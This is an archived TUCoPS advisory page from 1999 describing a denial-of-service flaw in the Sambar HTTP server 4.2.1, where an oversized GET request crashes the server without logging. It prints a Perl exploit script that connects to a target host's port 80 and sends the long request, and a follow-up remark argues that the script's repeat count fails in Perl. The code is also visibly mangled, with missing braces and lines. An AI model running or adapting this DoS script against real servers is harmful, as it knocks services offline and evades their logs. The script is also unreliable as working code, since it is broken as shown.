Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: sambar2.htm

Sambar server DoS attack





    Dennis Conrad found following.  While testing the security of  the
    Sambar HTTP-Server he found it vulnerable to a simple DOS  attack.
    Sending a "GET  XXXX(...a lot of  Xs..)XXXX HTTP/1.0" crashes  the
    Server.    It  will   die  WITHOUT   logging  the   attack.    His

        Sambar 4.2.1
        MS IE 5.0 (de)
        Windows 95 C (de)

    Sample exploit code follows:


    # Sample DOS against the Sambar HTTP-Server
    # This was tested against Sambar 4.2.1 running on Windows95 C
    # This attack will NOT be logged! Only use it to determine if
    # your Server is vulnerable!
    # Dennis Conrad (

    use IO::Socket;

    print "+++++++++\n";
    print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n";
    print "+ Found on the 3rd of October 1999 by dennis\\n\n";

    if ($#ARGV != 0) {
            die "+ Please give the host address as argument\n"

    opensocket ("\n");
    print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n";
    close $remote;

    opensocket ("\n+ The server seemed to be vulnerable to this attack\n");
    close $remote;
    die "+ The server does not seem to be vulnerable to this attack\n";

    sub opensocket {
            $remote = IO::Socket::INET->new (
                    Proto => "tcp",
                    PeerAddr => $ARGV[0],
                    PeerPort => "http(80)",
            ) || die "+ Can't open http-port on $ARGV[0]$_[0]";

    Using that  many 9s  on my  version of  Perl fails  silently.  The
    above seems equivalent to: print $remote "GET  HTTP/1.0\n\n";

        steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999;'
        steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999 || die;'
        Died at -e line 1.
        steve@grok:/home/steve% perl -v

        This is perl, version 5.005_03 built for i386-freebsd


    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH